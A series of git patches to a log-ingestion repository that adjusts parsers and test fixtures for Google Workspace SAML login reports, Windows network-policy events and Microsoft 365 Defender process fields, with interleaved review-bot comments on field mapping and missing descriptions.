@@ -0,0 +1,63 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + }, + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:24:58.191Z\",\"uniqueQualifier\":\"-318965716033600000\",\"applicationName\":\"saml\",\"customerId\":\"C000000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"113844576558700000000\"},\"ipAddress\":\"8.6.15.1\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/dev\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS Client VPN\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}" + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:24:58.191Z\",\"uniqueQualifier\":\"-318965716033600000\",\"applicationName\":\"saml\",\"customerId\":\"C000000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"113844576558700000000\"},\"ipAddress\":\"8.6.15.1\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/dev\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS Client VPN\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", + "event": { + "action": "login_success", + "category": [ + "authentication" + ], + "dataset": "admin#reports#activity", + "type": [ + "allowed" + ] + }, + "@timestamp": "2024-11-07T14:24:58.191000Z", + "cloud": { + "account": { + "id": "C000000000" + } + }, + "google": { + "report": { + "actor": { + "email": "John.doe@test.com" + }, + "saml": { + "application_name": "AWS Client VPN", + "initiator": "sp", + "status_code": "SUCCESS_URI" + } + } + }, + "network": { + 
"application": "saml" + }, + "related": { + "ip": [ + "8.6.15.1" + ], + "user": [ + "John.doe" + ] + }, + "source": { + "address": "8.6.15.1", + "ip": "8.6.15.1" + }, + "user": { + "domain": "test.com", + "email": "John.doe@test.com", + "id": "113844576558700000000", + "name": "John.doe" + } + } +} \ No newline at end of file From 49f05ead8e481396ef55f2e998ec6f1be38169d0 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Wed, 13 Nov 2024 16:00:13 +0100 Subject: [PATCH 222/317] feat(Windows): copy CallingStationID as source ip or source mac and copy AuthenticationServer as destination domain --- Windows/windows/ingest/parser.yml | 13 +++++++++++++ Windows/windows/tests/Event_6272.json | 9 +++++++++ Windows/windows/tests/Event_6273.json | 9 +++++++++ Windows/windows/tests/process_6272.json | 13 +++++++++++++ 4 files changed, 44 insertions(+) diff --git a/Windows/windows/ingest/parser.yml b/Windows/windows/ingest/parser.yml index f0bd6640b..c34ff2684 100644 --- a/Windows/windows/ingest/parser.yml +++ b/Windows/windows/ingest/parser.yml @@ -164,6 +164,8 @@ pipeline: - name: dns_fields - name: action_target - name: destination + - name: set_network_policy_fields + filter: "{{ json.event.SourceName == 'Microsoft-Windows-Security-Auditing' and json.event.EventID in [6272, 6273, 6274, 6275, 6276, 6277, 6278, 6279, 6280]}}" - name: rule - name: finalize @@ -1150,6 +1152,17 @@ stages: source.address: "{{json_event.message.SourceAddr}}" filter: "{{json.event.SourceAddr | is_ipaddress}}" + set_network_policy_fields: + actions: + - set: + source.ip: "{{ json.event.CallingStationID }}" + filter: "{{json.event.CallingStationID | is_ipaddress}}" + - set: + source.mac: "{{ json.event.CallingStationID }}" + filter: "{{ final.source.ip == null }}" + - set: + destination.domain: "{{ json.event.AuthenticationServer }}" + rule: actions: - set: diff --git a/Windows/windows/tests/Event_6272.json b/Windows/windows/tests/Event_6272.json index 4a3212af2..20213504d 100644 
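Review bot: In `set_network_policy_fields`, `source.mac` receives `CallingStationID` whenever the value is not an IP address and `source.ip` is still unset, with no check that it actually looks like a MAC; the commit message itself anticipates both IP and MAC forms, and a RADIUS Calling-Station-Id can carry other caller identifiers or a placeholder, so such values would end up in `source.mac` — gate that action on a MAC format check if the engine provides one. `destination.domain` is set from `AuthenticationServer` unconditionally, and the updated `process_6272.json` fixture shows what happens when that field holds an address: `destination.domain: "1.2.3.4"` and `related.hosts` gaining an IP. Routing the value through `is_ipaddress` the same way `source.ip` is, as below, keeps addresses in `destination.ip` and names in `destination.domain`.
```yaml
      - set:
          destination.ip: "{{ json.event.AuthenticationServer }}"
        filter: "{{ json.event.AuthenticationServer | is_ipaddress }}"
      - set:
          destination.domain: "{{ json.event.AuthenticationServer }}"
        filter: "{{ final.destination.ip == null }}"
```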
--- a/Windows/windows/tests/Event_6272.json +++ b/Windows/windows/tests/Event_6272.json @@ -42,6 +42,14 @@ "record_id": 1674356873, "type": "Security" }, + "destination": { + "address": "auth.example.org", + "domain": "auth.example.org", + "registered_domain": "example.org", + "size_in_char": 16, + "subdomain": "auth", + "top_level_domain": "org" + }, "host": { "hostname": "hostname.example.org", "name": "hostname.example.org" @@ -63,6 +71,7 @@ }, "related": { "hosts": [ + "auth.example.org", "hostname.example.org" ], "user": [ diff --git a/Windows/windows/tests/Event_6273.json b/Windows/windows/tests/Event_6273.json index 8ad5a2226..118cf2445 100644 --- a/Windows/windows/tests/Event_6273.json +++ b/Windows/windows/tests/Event_6273.json @@ -42,6 +42,14 @@ "record_id": 783949626, "type": "Security" }, + "destination": { + "address": "auth.example.org", + "domain": "auth.example.org", + "registered_domain": "example.org", + "size_in_char": 16, + "subdomain": "auth", + "top_level_domain": "org" + }, "host": { "hostname": "hostname.example.org", "name": "hostname.example.org" @@ -63,6 +71,7 @@ }, "related": { "hosts": [ + "auth.example.org", "hostname.example.org" ], "user": [ diff --git a/Windows/windows/tests/process_6272.json b/Windows/windows/tests/process_6272.json index af1d9fe1d..3135f15c9 100644 --- a/Windows/windows/tests/process_6272.json +++ b/Windows/windows/tests/process_6272.json @@ -42,6 +42,11 @@ "record_id": 2324634, "type": "Security" }, + "destination": { + "address": "1.2.3.4", + "domain": "1.2.3.4", + "size_in_char": 7 + }, "host": { "hostname": "test", "name": "test" @@ -63,12 +68,20 @@ }, "related": { "hosts": [ + "1.2.3.4", "test" ], + "ip": [ + "10.24.25.25" + ], "user": [ "testUser" ] }, + "source": { + "address": "10.24.25.25", + "ip": "10.24.25.25" + }, "user": { "domain": "NT01", "id": "S-1-5-21-1111111111-111111111-1111111111-1111", From 7c47ee4ee8a16e39ece3021bd65f19304c722bc8 Mon Sep 17 00:00:00 2001 
From: TOUFIKI Zakarya Date: Wed, 13 Nov 2024 16:07:01 +0100 Subject: [PATCH 223/317] Apply linter --- Google Cloud/google-report/_meta/fields.yml | 24 +++++++++---------- Google Cloud/google-report/ingest/parser.yml | 6 ++--- .../tests/test_saml_login_success.json | 4 ++-- .../tests/test_saml_login_success_1.json | 4 ++-- 4 files changed, 19 insertions(+), 19 deletions(-) diff --git a/Google Cloud/google-report/_meta/fields.yml b/Google Cloud/google-report/_meta/fields.yml index ad86f9169..ad9d8d0a7 100644 --- a/Google Cloud/google-report/_meta/fields.yml +++ b/Google Cloud/google-report/_meta/fields.yml @@ -33,14 +33,14 @@ google.report.parameters.visibility: name: google.report.parameters.visibility type: keyword -google.report.token.app_name: - description: Token authorization application name - name: google.report.token.app_name +google.report.saml.application_name: + description: Saml SP application name + name: google.report.saml.application_name type: keyword -google.report.token.type: - description: Token type - name: google.report.token.type +google.report.saml.initiator: + description: SAML requester of saml authentication + name: google.report.saml.initiator type: keyword google.report.saml.status_code: @@ -48,12 +48,12 @@ google.report.saml.status_code: name: google.report.saml.status_code type: keyword -google.report.saml.initiator: - description: SAML requester of saml authentication - name: google.report.saml.initiator +google.report.token.app_name: + description: Token authorization application name + name: google.report.token.app_name type: keyword -google.report.saml.application_name: - description: Saml SP application name - name: google.report.saml.application_name +google.report.token.type: + description: Token type + name: google.report.token.type type: keyword diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml index e00c5ee79..3a0fce88f 100644 
--- a/Google Cloud/google-report/ingest/parser.yml +++ b/Google Cloud/google-report/ingest/parser.yml @@ -269,12 +269,12 @@ stages: google.report.saml.status_code: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "saml_status_code" %}{{param.value}}{% endif %}{% endfor %}' google.report.saml.initiator: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "initiated_by" %}{{param.value}}{% endif %}{% endfor %}' google.report.saml.application_name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "application_name" %}{{param.value}}{% endif %}{% endfor %}' - + - set: event.type: ["allowed"] filter: '{{ json_event.message.events[0].name == "login_success"}}' - + - set: event.type: ["denied"] event.reason: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "failure_type" %}{{param.value}}{% endif %}{% endfor %}' - filter: '{{ json_event.message.events[0].name == "login_failure"}}' + filter: '{{ json_event.message.events[0].name == "login_failure"}}' diff --git a/Google Cloud/google-report/tests/test_saml_login_success.json b/Google Cloud/google-report/tests/test_saml_login_success.json index a96c1fab6..8a9785816 100644 --- a/Google Cloud/google-report/tests/test_saml_login_success.json +++ b/Google Cloud/google-report/tests/test_saml_login_success.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:26:15.515Z\",\"uniqueQualifier\":\"4091348940000000\",\"applicationName\":\"saml\",\"customerId\":\"C00000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"10344515534360000000\"},\"ipAddress\":\"2.1.3.2\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/implementation\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", "sekoiaio": { "intake": { "dialect": "Google Report", "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" } - }, - "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:26:15.515Z\",\"uniqueQualifier\":\"4091348940000000\",\"applicationName\":\"saml\",\"customerId\":\"C00000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"10344515534360000000\"},\"ipAddress\":\"2.1.3.2\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/implementation\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}" + } }, "expected": { "message": 
"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:26:15.515Z\",\"uniqueQualifier\":\"4091348940000000\",\"applicationName\":\"saml\",\"customerId\":\"C00000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"10344515534360000000\"},\"ipAddress\":\"2.1.3.2\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/implementation\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", diff --git a/Google Cloud/google-report/tests/test_saml_login_success_1.json b/Google Cloud/google-report/tests/test_saml_login_success_1.json index 94e5f299f..de8e102d7 100644 --- a/Google Cloud/google-report/tests/test_saml_login_success_1.json +++ b/Google Cloud/google-report/tests/test_saml_login_success_1.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:24:58.191Z\",\"uniqueQualifier\":\"-318965716033600000\",\"applicationName\":\"saml\",\"customerId\":\"C000000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"113844576558700000000\"},\"ipAddress\":\"8.6.15.1\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/dev\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS Client VPN\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", "sekoiaio": { "intake": { "dialect": "Google Report", "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" } - }, - "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:24:58.191Z\",\"uniqueQualifier\":\"-318965716033600000\",\"applicationName\":\"saml\",\"customerId\":\"C000000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"113844576558700000000\"},\"ipAddress\":\"8.6.15.1\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/dev\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS Client VPN\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}" + } }, "expected": { "message": 
"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:24:58.191Z\",\"uniqueQualifier\":\"-318965716033600000\",\"applicationName\":\"saml\",\"customerId\":\"C000000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"113844576558700000000\"},\"ipAddress\":\"8.6.15.1\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/dev\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS Client VPN\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", From 462382e15fa0254cb24676a97571ed0edadafc82 Mon Sep 17 00:00:00 2001 
From: LenaigKaliou Date: Wed, 13 Nov 2024 16:14:34 +0100 Subject: [PATCH 224/317] Fix/Microsoft 365 Defender: Fix on process* fields --- .../microsoft-365-defender/_meta/fields.yml | 264 ++++++++++-------- .../microsoft-365-defender/ingest/parser.yml | 150 +++++++--- .../tests/test_device_event.json | 22 +- ...test_device_event_sensitive_file_read.json | 100 +++++++ ...vents_2.json => test_device_events_2.json} | 13 +- ...test_device_events_get_clipboard_data.json | 83 ++++++ ...test_device_events_powershell_command.json | 83 ++++++ ..._device_events_shell_link_create_file.json | 103 +++++++ .../tests/test_device_file_event.json | 24 +- .../tests/test_device_file_event_02.json | 109 ++++++++ .../tests/test_device_image_load_event.json | 10 +- .../tests/test_device_logon_events.json | 6 +- .../tests/test_device_network_events.json | 26 +- .../tests/test_device_process_created.json | 8 +- .../tests/test_device_process_events.json | 83 +++--- .../tests/test_device_process_events_2.json | 127 ++++++--- .../tests/test_device_registry_events.json | 24 +- .../test_devices_events_script_content.json | 13 +- .../tests/test_email_events.json | 22 +- .../tests/test_email_post_delivery.json | 2 +- .../tests/test_email_url_info.json | 22 +- .../tests/test_identity_directory.json | 22 +- .../tests/test_identity_info.json | 22 +- .../tests/test_identity_info_2.json | 2 +- .../tests/test_identity_logon.json | 22 +- .../tests/test_identity_query.json | 22 +- .../tests/test_local_ip.json | 22 +- .../tests/test_process_error.json | 54 ++-- 28 files changed, 1068 insertions(+), 392 deletions(-) create mode 100644 Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json rename Microsoft/microsoft-365-defender/tests/{test_deivce_events_2.json => test_device_events_2.json} (98%) create mode 100644 Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json create mode 100644 
Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json create mode 100644 Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json create mode 100644 Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json diff --git a/Microsoft/microsoft-365-defender/_meta/fields.yml b/Microsoft/microsoft-365-defender/_meta/fields.yml index f69ef372d..0e6154ccd 100644 --- a/Microsoft/microsoft-365-defender/_meta/fields.yml +++ b/Microsoft/microsoft-365-defender/_meta/fields.yml 
@@ -133,78 +133,6 @@ action.properties.ISP: name: action.properties.ISP type: keyword -action.properties.InitiatingProcessAccountObjectId: - description: Azure AD object ID of the user account that ran the process responsible - for the event - name: action.properties.InitiatingProcessAccountObjectId - type: keyword - -action.properties.InitiatingProcessCommandLine: - description: Process commande Line that initiated the event - name: action.properties.InitiatingProcessCommandLine - type: keyword - -action.properties.InitiatingProcessFileSize: - description: Size of the process (image file) that initiated the event - name: action.properties.InitiatingProcessFileSize - type: long - -action.properties.InitiatingProcessIntegrityLevel: - description: Integrity level of the process that initiated the event. Windows assigns - integrity levels to processes based on certain characteristics, such as if they - were launched from an internet download. These integrity levels influence permissions - to resources - name: action.properties.InitiatingProcessIntegrityLevel - type: keyword - -action.properties.InitiatingProcessLogonId: - description: Identifier for a logon session of the process that initiated the event. - This identifier is unique on the same machine only between restarts. 
- name: action.properties.InitiatingProcessLogonId - type: keyword - -action.properties.InitiatingProcessTokenElevation: - description: Token type indicating the presence or absence of User Access Control - (UAC) privilege elevation applied to the process that initiated the event - name: action.properties.InitiatingProcessTokenElevation - type: keyword - -action.properties.InitiatingProcessVersionInfoCompanyName: - description: Company name from the version information of the process (image file) - responsible for the event - name: action.properties.InitiatingProcessVersionInfoCompanyName - type: keyword - -action.properties.InitiatingProcessVersionInfoFileDescription: - description: Description from the version information of the process (image file) - responsible for the event - name: action.properties.InitiatingProcessVersionInfoFileDescription - type: keyword - -action.properties.InitiatingProcessVersionInfoInternalFileName: - description: Internal file name from the version information of the process (image - file) responsible for the event - name: action.properties.InitiatingProcessVersionInfoInternalFileName - type: keyword - -action.properties.InitiatingProcessVersionInfoOriginalFileName: - description: Original file name from the version information of the process (image - file) responsible for the event - name: action.properties.InitiatingProcessVersionInfoOriginalFileName - type: keyword - -action.properties.InitiatingProcessVersionInfoProductName: - description: Product name from the version information of the process (image file) - responsible for the event - name: action.properties.InitiatingProcessVersionInfoProductName - type: keyword - -action.properties.InitiatingProcessVersionInfoProductVersion: - description: Product version from the version information of the process (image - file) responsible for the event - name: action.properties.InitiatingProcessVersionInfoProductVersion - type: keyword - action.properties.IsAdminOperation: description: 
Indicates whether the activity was performed by an administrator name: action.properties.IsAdminOperation 
@@ -353,51 +281,6 @@ action.properties.PreviousRegistryValueName: name: action.properties.PreviousRegistryValueName type: keyword -action.properties.ProcessIntegrityLevel: - description: Integrity level of the newly created process. Windows assigns integrity - levels to processes based on certain characteristics, such as if they were launched - from an internet downloaded. These integrity levels influence permissions to resources - name: action.properties.ProcessIntegrityLevel - type: keyword - -action.properties.ProcessTokenElevation: - description: Token type indicating the presence or absence of User Access Control - (UAC) privilege elevation applied to the newly created process - name: action.properties.ProcessTokenElevation - type: keyword - -action.properties.ProcessVersionInfoCompanyName: - description: Company name from the version information of the newly created process - name: action.properties.ProcessVersionInfoCompanyName - type: keyword - -action.properties.ProcessVersionInfoFileDescription: - description: Description from the version information of the newly created process - name: action.properties.ProcessVersionInfoFileDescription - type: keyword - -action.properties.ProcessVersionInfoInternalFileName: - description: Internal file name from the version information of the newly created - process - name: action.properties.ProcessVersionInfoInternalFileName - type: keyword - -action.properties.ProcessVersionInfoOriginalFileName: - description: Original file name from the version information of the newly created - process - name: action.properties.ProcessVersionInfoOriginalFileName - type: keyword - -action.properties.ProcessVersionInfoProductName: - description: Product name from the version information of the newly created process - name: action.properties.ProcessVersionInfoProductName - type: keyword - -action.properties.ProcessVersionInfoProductVersion: - description: Product version from the version information of the newly created process - name: 
action.properties.ProcessVersionInfoProductVersion - type: keyword - action.properties.Query: description: String used to run the query name: action.properties.Query 
@@ -529,6 +412,143 @@ action.properties.UserLevelPolicy: name: action.properties.UserLevelPolicy type: keyword +action.properties.process.AccountObjectId: + description: Azure AD object ID of the user account that ran the process responsible + for the event + name: action.properties.process.AccountObjectId + type: keyword + +action.properties.process.CommandLine: + description: Process commande Line that initiated the event + name: action.properties.process.CommandLine + type: keyword + +action.properties.process.FileSize: + description: Size of the process (image file) that initiated the event + name: action.properties.process.FileSize + type: long + +action.properties.process.IntegrityLevel: + description: Integrity level of the newly created process. Windows assigns integrity + levels to processes based on certain characteristics, such as if they were launched + from an internet downloaded. These integrity levels influence permissions to resources + name: action.properties.process.IntegrityLevel + type: keyword + +action.properties.process.LogonId: + description: Identifier for a logon session of the process that initiated the event. + This identifier is unique on the same machine only between restarts. 
+ name: action.properties.process.LogonId + type: keyword + +action.properties.process.TokenElevation: + description: Token type indicating the presence or absence of User Access Control + (UAC) privilege elevation applied to the newly created process + name: action.properties.process.TokenElevation + type: keyword + +action.properties.process.VersionInfoCompanyName: + description: Company name from the version information of the newly created process + name: action.properties.process.VersionInfoCompanyName + type: keyword + +action.properties.process.VersionInfoFileDescription: + description: Description from the version information of the newly created process + name: action.properties.process.VersionInfoFileDescription + type: keyword + +action.properties.process.VersionInfoInternalFileName: + description: Internal file name from the version information of the newly created + process + name: action.properties.process.VersionInfoInternalFileName + type: keyword + +action.properties.process.VersionInfoOriginalFileName: + description: Original file name from the version information of the newly created + process + name: action.properties.process.VersionInfoOriginalFileName + type: keyword + +action.properties.process.VersionInfoProductName: + description: Product name from the version information of the newly created process + name: action.properties.process.VersionInfoProductName + type: keyword + +action.properties.process.VersionInfoProductVersion: + description: Product version from the version information of the newly created process + name: action.properties.process.VersionInfoProductVersion + type: keyword + +action.properties.process.parent.AccountObjectId: + description: Azure AD object ID of the user account that ran the parent process + responsible for the event + name: action.properties.process.parent.AccountObjectId + type: keyword + +action.properties.process.parent.CommandLine: + description: Parent process commande Line that initiated the event + 
name: action.properties.process.parent.CommandLine + type: keyword + +action.properties.process.parent.FileSize: + description: Size of the parent process (image file) that initiated the event + name: action.properties.process.parent.FileSize + type: long + +action.properties.process.parent.IntegrityLevel: + description: Integrity level of the parent process that initiated the event. Windows + assigns integrity levels to processes based on certain characteristics, such as + if they were launched from an internet download. These integrity levels influence + permissions to resources + name: action.properties.process.parent.IntegrityLevel + type: keyword + +action.properties.process.parent.LogonId: + description: Identifier for a logon session of the parent process that initiated + the event. This identifier is unique on the same machine only between restarts. + name: action.properties.process.parent.LogonId + type: keyword + +action.properties.process.parent.TokenElevation: + description: Token type indicating the presence or absence of User Access Control + (UAC) privilege elevation applied to the parent process that initiated the event + name: action.properties.process.parent.TokenElevation + type: keyword + +action.properties.process.parent.VersionInfoCompanyName: + description: Company name from the version information of the parent process (image + file) responsible for the event + name: action.properties.process.parent.VersionInfoCompanyName + type: keyword + +action.properties.process.parent.VersionInfoFileDescription: + description: Description from the version information of the parent process (image + file) responsible for the event + name: action.properties.process.parent.VersionInfoFileDescription + type: keyword + +action.properties.process.parent.VersionInfoInternalFileName: + description: Internal file name from the version information of the parent process + (image file) responsible for the event + name: 
action.properties.process.parent.VersionInfoInternalFileName + type: keyword + +action.properties.process.parent.VersionInfoOriginalFileName: + description: '' + name: action.properties.process.parent.VersionInfoOriginalFileName + type: keyword + +action.properties.process.parent.VersionInfoProductName: + description: '' + name: action.properties.process.parent.VersionInfoProductName + type: keyword + +action.properties.process.parent.VersionInfoProductVersion: + description: Product version from the version information of the parent process + (image file) responsible for the event + name: action.properties.process.parent.VersionInfoProductVersion + type: keyword + email.direction: description: The direction of the message based on the sending and receiving domains name: email.direction @@ -821,6 +841,16 @@ microsoft.defender.threat.types: name: microsoft.defender.threat.types type: keyword +process.parent.user.domain: + description: '' + name: process.parent.user.domain + type: keyword + +process.parent.user.email: + description: '' + name: process.parent.user.email + type: keyword + process.user.domain: description: Domain of the account that ran the process responsible for the event name: process.user.domain diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml index 2a8b6655f..f60d9b6f0 100644 --- a/Microsoft/microsoft-365-defender/ingest/parser.yml +++ b/Microsoft/microsoft-365-defender/ingest/parser.yml 
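Review bot: Two new definitions in this hunk carry `description: ''` (`action.properties.process.parent.VersionInfoOriginalFileName` and `action.properties.process.parent.VersionInfoProductName`), as do `process.parent.user.domain` and `process.parent.user.email` in the next hunk, although the removed definitions had wording that can be reused, e.g. `description: Original file name from the version information of the parent process (image file) responsible for the event`. The `action.properties.process.*` descriptions mix the two old families: `CommandLine` and `FileSize` say "that initiated the event" while `IntegrityLevel` and `TokenElevation` say "newly created process", and "commande Line" is a typo for "command line" in both `CommandLine` entries. The old `action.properties.InitiatingProcess*` and `action.properties.Process*` names are deleted rather than kept alongside the new ones, so any stored event, rule or dashboard that references them stops matching — if that is intended, it is worth saying so in the commit message.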
@@ -40,6 +40,10 @@ pipeline:
 input_field: "{{json_event.message.properties.RawEventData.Data}}"
 output_field: "data"
 - name: set_common_fields
+ - name: set_process_events
+ filter: '{{json_event.message.get("category") not in ["AdvancedHunting-DeviceProcessEvents", "AdvancedHunting-DeviceEvents"] or (json_event.message.get("category") == "AdvancedHunting-DeviceEvents" and json_event.message.properties.get("ActionType").lower() in ["antivirusscancancelled", "antivirusscancompleted", "antivirusscanfailed", "appcontrolpolicyapplied", "appguardbrowsetourl", "appguardcreatecontainer", "appguardlaunchedwithurl", "appguardresumecontainer", "auditpolicymodification", "browserlaunchedtoopenurl", "clrunbackedmoduleloaded", "controlflowguardviolation", "createremotethreadapicall", "dnsqueryresponse", "dpapiaccessed", "exploitguardacgenforced", "exploitguardwin32systemcallblocked", "getasynckeystateapicall", "getclipboarddata", "ldapsearch", "memoryremoteprotect", "namedpipeevent", "ntallocatevirtualmemoryapicall", "ntallocatevirtualmemoryremoteapicall", "ntmapviewofsectionremoteapicall", "ntprotectvirtualmemoryapicall","otheralertrelatedactivity", "powershellcommand", "processprimarytokenmodified", "screenshottaken", "smartscreenurlwarning", "writetolsassprocessmemory"])}}'
+ - name: set_process_deviceprocess_events
+ filter: '{{json_event.message.get("category") == "AdvancedHunting-DeviceProcessEvents" or (json_event.message.get("category") == "AdvancedHunting-DeviceEvents" and json_event.message.properties.get("ActionType").lower() not in ["antivirusscancancelled", "antivirusscancompleted", "antivirusscanfailed", "appcontrolpolicyapplied", "appguardbrowsetourl", "appguardcreatecontainer", "appguardlaunchedwithurl", "appguardresumecontainer", "auditpolicymodification", "browserlaunchedtoopenurl", "clrunbackedmoduleloaded", "controlflowguardviolation", "createremotethreadapicall", "dnsqueryresponse", "dpapiaccessed", "exploitguardacgenforced", 
"exploitguardwin32systemcallblocked", "getasynckeystateapicall", "getclipboarddata", "ldapsearch", "memoryremoteprotect", "namedpipeevent", "ntallocatevirtualmemoryapicall", "ntallocatevirtualmemoryremoteapicall", "ntmapviewofsectionremoteapicall", "ntprotectvirtualmemoryapicall","otheralertrelatedactivity", "powershellcommand", "processprimarytokenmodified", "screenshottaken", "smartscreenurlwarning", "writetolsassprocessmemory"])}}' - name: set_alert_evidence_fields filter: '{{json_event.message.get("category") == "AdvancedHunting-AlertEvidence"}}' - name: set_alert_info_fields 
@@ -126,22 +130,6 @@ stages:
 host.os.full: "{{json_event.message.properties.OSPlatform}}"
 host.os.version: "{{json_event.message.properties.OSVersion}}"
 host.type: "{{json_event.message.properties.DeviceType}}"
- process.hash.md5: "{{json_event.message.InitiatingProcessMD5 or json_event.message.properties.InitiatingProcessMD5}}"
- process.hash.sha1: "{{json_event.message.InitiatingProcessSHA1 or json_event.message.properties.InitiatingProcessSHA1}}"
- process.hash.sha256: "{{json_event.message.InitiatingProcessSHA256 or json_event.message.properties.InitiatingProcessSHA256}}"
- process.pid: "{{json_event.message.properties.ProcessId or json_event.message.properties.InitiatingProcessId}}"
- process.start: "{{json_event.message.properties.ProcessCreationTime or json_event.message.properties.InitiatingProcessCreationTime}}"
- process.name: "{{json_event.message.properties.InitiatingProcessFileName | basename}}"
- process.command_line: "{{json_event.message.properties.ProcessCommandLine or json_event.message.properties.InitiatingProcessCommandLine}}"
- process.executable: "{{json_event.message.properties.InitiatingProcessFolderPath}}"
- process.working_directory: "{{json_event.message.properties.InitiatingProcessFolderPath | dirname}}"
- process.user.domain: "{{json_event.message.properties.InitiatingProcessAccountDomain}}"
- process.user.name: "{{json_event.message.properties.InitiatingProcessAccountName}}"
- process.user.id: "{{json_event.message.properties.InitiatingProcessAccountSid}}"
- process.user.email: "{{json_event.message.properties.InitiatingProcessAccountUpn}}"
- process.parent.pid: "{{json_event.message.properties.InitiatingProcessParentId}}"
- process.parent.name: "{{json_event.message.properties.InitiatingProcessParentFileName | basename}}"
- process.parent.start: "{{json_event.message.properties.InitiatingProcessParentCreationTime}}"
 registry.data.type: "{{json_event.message.properties.RegistryValueType}}"
 registry.key: 
